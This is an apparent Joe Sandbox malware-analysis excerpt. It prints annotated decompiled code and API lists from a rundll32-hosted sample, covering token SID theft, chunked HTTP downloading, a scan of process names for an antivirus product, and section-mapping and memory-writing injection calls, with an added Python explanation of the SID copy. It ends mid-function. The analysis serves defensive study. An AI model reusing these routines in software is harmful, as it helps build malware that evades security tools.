                                			E03434321(char _a4, void* _a8) { // _a4: target PID; _a8: caller's 0x1c-byte buffer that receives the SID
                                				void* _v8; // token handle
                                				void* _v12; // process handle
                                				char _v16; // CLIENT_ID.UniqueThread
                                				void* _v20; // CLIENT_ID.UniqueProcess
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44; // OBJECT_ATTRIBUTES starts here (_v44 .. _v24, six dwords)
                                				void** _t33;
                                				void* _t40;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd"); // five stosd zero 20 bytes of the OBJECT_ATTRIBUTES block
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4; // CLIENT_ID.UniqueProcess = PID
                                				_t48 = 0; // return value, stays 0 until the SID has been copied
                                				_v16 = 0; // CLIENT_ID.UniqueThread = 0
                                				_a4 = 0; // reused below as the ReturnLength of NtQueryInformationToken
                                				_v44 = 0x18; // OBJECT_ATTRIBUTES.Length = sizeof(OBJECT_ATTRIBUTES) on x86
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) { // 0x400 = PROCESS_QUERY_INFORMATION
                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33); // NtOpenProcessToken(hProcess, TOKEN_QUERY, &hToken); the import is unresolved in the decompilation, see the API list below
                                					if(_t33 >= 0) {
                                						_t47 = __imp__; // NtQueryInformationToken
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed; TokenUser (1) with a NULL buffer: size probe, the required length lands in _a4
                                						_t44 = E03436D63(_a4); // heap allocation of that size (RtlAllocateHeap wrapper, see subcall)
                                						if(_t44 != 0) {
                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed; second query fills the TOKEN_USER structure
                                							if(_t40 >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c); // *_t44 = TOKEN_USER.User.Sid; 0x1c = 28 bytes is the size of a SID with five sub-authorities (S-1-5-21-x-y-z-RID), copied with a fixed length regardless of the real SID size
                                								_t48 = 1;
                                							}
                                							E03436C2C(_t44); // free the heap buffer
                                						}
                                						NtClose(_v8); // executed
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}

                                (Instruction address column for the listing above: 0x0343432e to 0x034343e8.)

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 03434368
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 0343437B
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 03434397
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 034343B4
                                • memcpy.NTDLL(?,00000000,0000001C), ref: 034343C1
                                • NtClose.NTDLL(?), ref: 034343D3
                                • NtClose.NTDLL(00000000), ref: 034343DD
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 51b12ad42b52bd0a6709a78e6144e87ff90a664e43b5648f344194d9a245e77e
                                • Instruction ID: c57761af442b694bfa7c693d9208b79dbc6ef18e5fcb03bdfafe389a1c002259
                                • Opcode Fuzzy Hash: 51b12ad42b52bd0a6709a78e6144e87ff90a664e43b5648f344194d9a245e77e
                                • Instruction Fuzzy Hash: A921F6B6900219BFDB01EF95CC84ADEBFBDEB09740F108016F901EB254D7B19A549BA0
                                Uniqueness

                                Uniqueness Score: -1.00%
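The memcpy of 0x1c bytes in E03434321 only makes sense with the binary SID layout in mind. As an added example (not code from the sample, the report or Joe Sandbox), the Python below parses a raw SID the way those copied bytes have to be parsed, builds constructed test SIDs from their string form, and models what the fixed 28-byte copy does to SIDs that are not exactly five sub-authorities long. All SID values and function names here are constructed.

```python
"""Decode the raw SID that E03434321 copies out of TOKEN_USER.

Added example, not code from the sample or from the report.  Layout of a
binary SID: 1 byte revision, 1 byte sub-authority count, 6 bytes identifier
authority (big-endian), then 4 bytes little-endian per sub-authority.
"""
import struct
from typing import Optional

SID_HEADER_LEN = 8          # revision + count + 6-byte authority
SAMPLE_COPY_LEN = 0x1c      # the fixed memcpy length in E03434321

def sid_length(sid: bytes) -> int:
    """Byte length the SubAuthorityCount field says this SID has."""
    if len(sid) < SID_HEADER_LEN:
        raise ValueError("SID shorter than its 8-byte header")
    return SID_HEADER_LEN + 4 * sid[1]

def sid_to_string(sid: bytes) -> str:
    """Binary SID -> 'S-1-5-21-...' (what ConvertSidToStringSid would return)."""
    revision, count = sid[0], sid[1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    need = sid_length(sid)
    if len(sid) < need:
        raise ValueError("truncated SID: %d bytes present, %d needed" % (len(sid), need))
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, SID_HEADER_LEN)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)

def string_to_sid(text: str) -> bytes:
    """'S-1-5-21-...' -> binary SID; used here to build the constructed inputs."""
    parts = text.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID string: %r" % text)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("a SID carries at most 15 sub-authorities")
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def token_user_buffer_for(sid_text: str) -> bytes:
    """Constructed model of the heap block the second NtQueryInformationToken
    call fills: an 8-byte SID_AND_ATTRIBUTES header (Sid pointer field with a
    placeholder value, Attributes) followed directly by the SID."""
    return struct.pack("<II", 8, 0) + string_to_sid(sid_text)

def copy_like_sample(token_user_buffer: bytes, sid_offset: int = 8) -> bytes:
    """Mimic memcpy(_a8, TOKEN_USER.User.Sid, 0x1c): 0x1c bytes from the SID
    start, whatever the SID's real length.  Python slicing stops at the end
    of the buffer; the real memcpy does not, see overread_bytes()."""
    return token_user_buffer[sid_offset:sid_offset + SAMPLE_COPY_LEN]

def overread_bytes(token_user_buffer: bytes, sid_offset: int = 8) -> int:
    """How many bytes the fixed-length copy reads past the end of the block."""
    return max(0, sid_offset + SAMPLE_COPY_LEN - len(token_user_buffer))

def decode_copied_sid(copied: bytes) -> Optional[str]:
    """What the 28-byte destination buffer decodes to, or None if it cannot."""
    try:
        return sid_to_string(copied)
    except ValueError:
        return None

# Constructed example SIDs (not taken from the analysed machine).
USER_SID = "S-1-5-21-1004336348-1177238915-682003330-1001"      # 5 sub-authorities: exactly 0x1c bytes
SYSTEM_SID = "S-1-5-18"                                          # 1 sub-authority: 12 bytes
LONG_SID = "S-1-5-21-1004336348-1177238915-682003330-1001-500"  # 6 sub-authorities: 32 bytes
```

The 28-byte figure is the 8-byte SID header plus five 4-byte sub-authorities, which is the shape of every S-1-5-21-domain-RID account SID, so the copy is exact for the interactive user the sample is after. For a 12-byte service SID such as S-1-5-18 the same memcpy reads 16 bytes beyond the 20-byte TOKEN_USER allocation, and a SID with more than five sub-authorities is truncated and no longer decodes.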

                                APIs
                                • memcpy.NTDLL(?,?,?,0347C71A,?,?,?,?,?,0347C71A,?,?,00000000), ref: 03486F59
                                  • Part of subcall function 0347C4FB: GetModuleHandleA.KERNEL32(?,?,?,03487017,?,?,?,00000000), ref: 0347C539
                                  • Part of subcall function 0347C4FB: memcpy.NTDLL(?,0349A30C,00000018,?,?,?), ref: 0347C5B5
                                • memcpy.NTDLL(?,?,00000018,0347C71A,?,?,?,?,?,0347C71A,?,?,00000000), ref: 03486FA7
                                • memcpy.NTDLL(?,0348DD8F,00000800,?,?,?,00000000), ref: 0348702A
                                • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 03487068
                                • NtClose.NTDLL(00000000,?,00000000), ref: 0348708F
                                  • Part of subcall function 03488F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0347C71A,0347C71A,?,03486EFA,?,0347C71A,?,?,00000000), ref: 03488F87
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03488FA9
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03488FBF
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03488FD5
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03488FEB
                                  • Part of subcall function 03488F62: GetProcAddress.KERNEL32(00000000,?), ref: 03489001
                                  • Part of subcall function 0348BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0347717E,00000000,00000000,0347717E,?,00000002,00000000,?,0347C71A,00000000,0347717E,000000FF,?), ref: 0348BEAE
                                  • Part of subcall function 03481CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,0347C71A,?,?,00000000), ref: 03481D58
                                  • Part of subcall function 03481CE4: memcpy.NTDLL(?,?,?), ref: 03481DBF
                                • memset.NTDLL ref: 034870AA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                                • String ID:
                                • API String ID: 3674896251-0
                                • Opcode ID: a2129a2775ad035996ac8b45827cd9c37196d1e1a62806df3603e7197a7ea83a
                                • Instruction ID: e1f81be2fca2b1120a2e1229950dfae85ae1046c7e2b6bf44a6346fc2488280c
                                • Opcode Fuzzy Hash: a2129a2775ad035996ac8b45827cd9c37196d1e1a62806df3603e7197a7ea83a
                                • Instruction Fuzzy Hash: 9DA14B7590020AEFCB11EFA9C880AAEBBB4BF05304F14456AE911AF350D735EA44DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 71%
                                			E03431CA5(void* __eax, void* __ecx) { // __eax: request context (+0x18 hRequest, +0x1c completion event, +0x28 error recorded by the completion path); returns 0 or a Win32 error code
                                				long _v8; // bytes read by the last InternetReadFile
                                				void* _v12; // consumer object (vtable-based) obtained through the pointer at 0x343a174
                                				void* _v16; // 0x1000-byte chunk buffer
                                				void _v20; // 4-byte first read
                                				void* __esi;
                                				void* _t30;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				intOrPtr* _t41;
                                				int _t45;
                                				long _t47;
                                				void* _t54;
                                				long _t64; // running error code, 0 = success
                                				void* _t67;
                                				void* _t69;
                                
                                				_t58 = __ecx;
                                				_t67 = __eax;
                                				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                					L2:
                                					_t30 = _t67;
                                					_pop(_t68);
                                					_t69 = _t30;
                                					_t64 = 0;
                                					ResetEvent( *(_t69 + 0x1c));
                                					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) { // first read: 4 bytes only
                                						L9:
                                						if(_v8 == 0) { // empty body
                                							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                						} else {
                                							 *0x343a174(0, 1,  &_v12); // executed; returns the consumer object in _v12
                                							if(0 != 0) {
                                								_t64 = 8;
                                							} else {
                                								_t38 = E03436D63(0x1000); // 4 KiB chunk buffer
                                								_v16 = _t38;
                                								if(_t38 == 0) {
                                									_t64 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                								} else {
                                									_push(0);
                                									_push(_v8);
                                									_push( &_v20); // arguments (buffer, length, 0) for the vtable call below; the 4 bytes read first are the first chunk
                                									while(1) {
                                										_t41 = _v12;
                                										_t61 =  *_t41;
                                										 *((intOrPtr*)( *_t41 + 0x10))(_t41); // vtable slot +0x10: hand one chunk to the consumer object
                                										ResetEvent( *(_t69 + 0x1c));
                                										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed; read the next chunk
                                										if(_t45 != 0) {
                                											goto L17;
                                										}
                                										_t64 = GetLastError();
                                										if(_t64 == 0x3e5) { // ERROR_IO_PENDING: the handle is asynchronous, wait for the completion event
                                											_t64 = E03436E40( *(_t69 + 0x1c), _t61, 0xffffffff); // wait with INFINITE timeout
                                											if(_t64 == 0) {
                                												_t64 =  *((intOrPtr*)(_t69 + 0x28)); // error stored by the completion path; 0 means the read completed
                                												if(_t64 == 0) {
                                													goto L17;
                                												}
                                											}
                                										}
                                										L19:
                                										E03436C2C(_v16); // free the chunk buffer
                                										if(_t64 == 0) {
                                											_t47 = E034315CC(_v12, _t69); // executed; finish the transfer with the consumer object
                                											_t64 = _t47;
                                										}
                                										goto L22;
                                										L17:
                                										_t64 = 0;
                                										if(_v8 != 0) {
                                											_push(0);
                                											_push(_v8);
                                											_push(_v16);
                                											continue; // more data: hand this chunk over and read again
                                										}
                                										goto L19; // zero bytes read: end of body
                                									}
                                								}
                                								L22:
                                								_t39 = _v12;
                                								 *((intOrPtr*)( *_t39 + 8))(_t39); // vtable slot +0x8: release the consumer object
                                							}
                                						}
                                					} else {
                                						_t64 = GetLastError();
                                						if(_t64 != 0x3e5) { // first read failed for a reason other than ERROR_IO_PENDING
                                							L8:
                                							if(_t64 == 0) {
                                								goto L9;
                                							}
                                						} else {
                                							_t64 = E03436E40( *(_t69 + 0x1c), _t58, 0xffffffff); // pending first read: wait on the completion event
                                							if(_t64 == 0) {
                                								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                								goto L8;
                                							}
                                						}
                                					}
                                					return _t64;
                                				} else {
                                					_t54 = E03434A85(__ecx, __eax); // field at +0xc not set yet: evaluate the response first (HttpQueryInfoA with 0x20000013 = HTTP_QUERY_FLAG_NUMBER|HTTP_QUERY_STATUS_CODE, see the subcall list below)
                                					if(_t54 != 0) {
                                						return _t54;
                                					} else {
                                						goto L2;
                                					}
                                				}
                                			}

                                (Instruction address column for the listing above: 0x03431ca5 to 0x03431cc0, continuing at 0x03437395 to 0x034374b5; the body of the function sits in a second code region.)

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,76CC81D0,00000000,00000000), ref: 0343739C
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 034373AB
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?,?), ref: 034373B5
                                • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 0343742E
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 0343743F
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?,?), ref: 03437449
                                  • Part of subcall function 03434A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 03434A9C
                                  • Part of subcall function 03434A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0343593D,00000000,?), ref: 03434AAC
                                  • Part of subcall function 03434A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 03434ADE
                                  • Part of subcall function 03434A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03434B03
                                  • Part of subcall function 03434A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 03434B23
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: 0ebdd744012f4374de81a1b4c80b51d4f6326d6e1bb39cacaefe7dec51413917
                                • Instruction ID: a9deba8802ecdc310d90883bba1404091d33867761c52b9fc357c191e83545ea
                                • Opcode Fuzzy Hash: 0ebdd744012f4374de81a1b4c80b51d4f6326d6e1bb39cacaefe7dec51413917
                                • Instruction Fuzzy Hash: CB41A372600304BFCB21EBA5CC44BABBFB9AF8E260F15456AE5D5EF250D770E9018B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0348235C
                                • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 03482369
                                • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 034823F5
                                • GetModuleHandleA.KERNEL32(00000000), ref: 03482400
                                • RtlImageNtHeader.NTDLL(00000000), ref: 03482409
                                • RtlExitUserThread.NTDLL(00000000), ref: 0348241E
                                  • Part of subcall function 03480818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03482397,?), ref: 03480820
                                  • Part of subcall function 03480818: GetVersion.KERNEL32 ref: 0348082F
                                  • Part of subcall function 03480818: GetCurrentProcessId.KERNEL32 ref: 0348084B
                                  • Part of subcall function 03480818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03480868
                                  • Part of subcall function 0347C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0347C815
                                  • Part of subcall function 0347A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03477D5E), ref: 0347A6BE
                                  • Part of subcall function 0348212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0347111D,00000000), ref: 0348214D
                                  • Part of subcall function 0348212C: GetProcAddress.KERNEL32(00000000,?), ref: 03482166
                                  • Part of subcall function 0348212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0347111D,00000000), ref: 03482183
                                  • Part of subcall function 0348212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0347111D,00000000), ref: 03482194
                                  • Part of subcall function 0348212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0347111D,00000000), ref: 034821A7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                                • String ID:
                                • API String ID: 2581485877-0
                                • Opcode ID: 5452e1e884380a1c22908d32988954df70975806e895fbcc15e6dab476305d23
                                • Instruction ID: 0e527c80bc09be0f412ef8cd008e9413537d553015bffd9283196a948cc7e13e
                                • Opcode Fuzzy Hash: 5452e1e884380a1c22908d32988954df70975806e895fbcc15e6dab476305d23
                                • Instruction Fuzzy Hash: 0C310335900218AFCB22FF74DC84AAEB7F8EB45710B25456BE516FF200D7708844CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E034368BD() { // returns 1 if the name of any running process contains the string at _t2 (case-insensitive)
                                				char _v264; // PROCESSENTRY32.szExeFile (offset 0x24 of the structure that starts at _v300)
                                				void* _v300; // PROCESSENTRY32
                                				void* _t5;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t5 = CreateToolhelp32Snapshot(2, 0); // executed; 2 = TH32CS_SNAPPROCESS
                                				_t17 = _t5;
                                				if(_t17 != 0) { // note: the API reports failure as INVALID_HANDLE_VALUE (-1), not 0
                                					_t8 = Process32First(_t17,  &_v300); // executed
                                					while(_t8 != 0) {
                                						_t9 =  *0x343a348; // 0x21ad5a8
                                						_t2 = _t9 + 0x343beb0; // 0x73617661; this first dword of the string is little-endian ASCII "avas"
                                						if(StrStrIA( &_v264, _t2) != 0) { // case-insensitive substring match against the executable name
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300);
                                							continue;
                                						}
                                						L7:
                                						FindCloseChangeNotification(_t17); // executed; closes the snapshot handle (behaves like CloseHandle, a common substitute that keeps CloseHandle out of the import list)
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}

                                (Instruction address column for the listing above: 0x034368c8 to 0x03436926.)

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 034368CD
                                • Process32First.KERNEL32(00000000,?), ref: 034368E0
                                • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 034368FA
                                • Process32Next.KERNEL32(00000000,?), ref: 0343690C
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0343691B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3243318325-0
                                • Opcode ID: 083c52a6ad5f79dbedfa5d13507b1cc5aba2d0b612638e00b42c52aacf49bde3
                                • Instruction ID: 5343edb42bc9883cdd52801f0c6566da6d0e958cbf47f7fc0324cf46a8156553
                                • Opcode Fuzzy Hash: 083c52a6ad5f79dbedfa5d13507b1cc5aba2d0b612638e00b42c52aacf49bde3
                                • Instruction Fuzzy Hash: ECF0F6361012157AD720E6668C88EEB76ACDFCE310F010067EA55DF100EB64DA468AA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 03477167
                                  • Part of subcall function 0348BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0347717E,00000000,00000000,0347717E,?,00000002,00000000,?,0347C71A,00000000,0347717E,000000FF,?), ref: 0348BEAE
                                • memset.NTDLL ref: 0347718B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Section$CreateViewmemset
                                • String ID: @
                                • API String ID: 2533685722-2766056989
                                • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                                • Instruction ID: b2246a1235e2bf204516a46e0f03216bfa4a0896ba7a039af38ac2f9674cd0fc
                                • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                                • Instruction Fuzzy Hash: FF214AB6D00209AFDB10DFA9C8809EEFBF9EF48350F10452AE615F7210D730AA458BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetProcAddress.KERNEL32(?,00000318), ref: 034861D3
                                • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 034861EF
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                  • Part of subcall function 0348A806: GetProcAddress.KERNEL32(?,00000000), ref: 0348A82F
                                  • Part of subcall function 0348A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03486230,00000000,00000000,00000028,00000100), ref: 0348A851
                                • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 03486359
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                • String ID:
                                • API String ID: 3547194813-0
                                • Opcode ID: 50806affa128e56c8a4db5d22d16278ae5cb28012cc8d3ebf0d006942f11de93
                                • Instruction ID: 76f816a1752df15c79433984fe4a57b6a765a996f90cf1f759017ef03c74588e
                                • Opcode Fuzzy Hash: 50806affa128e56c8a4db5d22d16278ae5cb28012cc8d3ebf0d006942f11de93
                                • Instruction Fuzzy Hash: 9E612E71A0060AAFDB55EF95C880BEEB7B4FF08300F15456AEA04AF341D774E954DBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 03480796
                                • GetProcAddress.KERNEL32(?), ref: 034807BE
                                • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 034807DC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressInformationProcProcess64QueryWow64memset
                                • String ID:
                                • API String ID: 2968673968-0
                                • Opcode ID: 65a9dd8742f57f9a8d3518bcd8ecef4dbd8b55ca5abcd23d94e32f3dc54fae95
                                • Instruction ID: ead4a981a7efe8df59460c5c6728e904465b6aea7692dc9890ab03b3470c826b
                                • Opcode Fuzzy Hash: 65a9dd8742f57f9a8d3518bcd8ecef4dbd8b55ca5abcd23d94e32f3dc54fae95
                                • Instruction Fuzzy Hash: A1117035A10219BFEB10EB95DC45F9EBBE8EB54740F04402AE904EF294D770ED09CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtAllocateVirtualMemory.NTDLL(0348EB0F,00000000,00000000,0348EB0F,00003000,00000040), ref: 03487981
                                • RtlNtStatusToDosError.NTDLL(00000000), ref: 03487988
                                • SetLastError.KERNEL32(00000000), ref: 0348798F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$AllocateLastMemoryStatusVirtual
                                • String ID:
                                • API String ID: 722216270-0
                                • Opcode ID: 789cba1f1b1039115cf30d3890fc963ee9d3daf638fb08c6e3ff0bc687c6f5a9
                                • Instruction ID: df6d17ed2c08ce4e59598af611a441041d967b98436290ea405d8ffdcc16e4af
                                • Opcode Fuzzy Hash: 789cba1f1b1039115cf30d3890fc963ee9d3daf638fb08c6e3ff0bc687c6f5a9
                                • Instruction Fuzzy Hash: 62F0FEB1911309FBFB05DB95D91AB9EBBBCAB54355F204049A600AA180DBB4AB04DB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0348907F,?,00000004,00000000,00000004,?), ref: 03485330
                                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0348533F
                                • SetLastError.KERNEL32(00000000,?,0348907F,?,00000004,00000000,00000004,?,?,?,?,0347C691,?,00000000,CCCCFEEB,?), ref: 03485346
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$LastMemoryStatusVirtualWrite
                                • String ID:
                                • API String ID: 1089604434-0
                                • Opcode ID: 56532238140da9782a913586658e6a9b6354743ee074c95a3bf160a8e5f0cbc5
                                • Instruction ID: fcf379404fd8926acdc2269d4715dee52718ebc81c787474ac3caf622484fd07
                                • Opcode Fuzzy Hash: 56532238140da9782a913586658e6a9b6354743ee074c95a3bf160a8e5f0cbc5
                                • Instruction Fuzzy Hash: 9FE04837100119ABCF026FE9AC04DDFBB99FB19750B004056FE01DA110C771C8219BE4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 72%
                                			E0343190C(intOrPtr* __eax, void** _a4) {
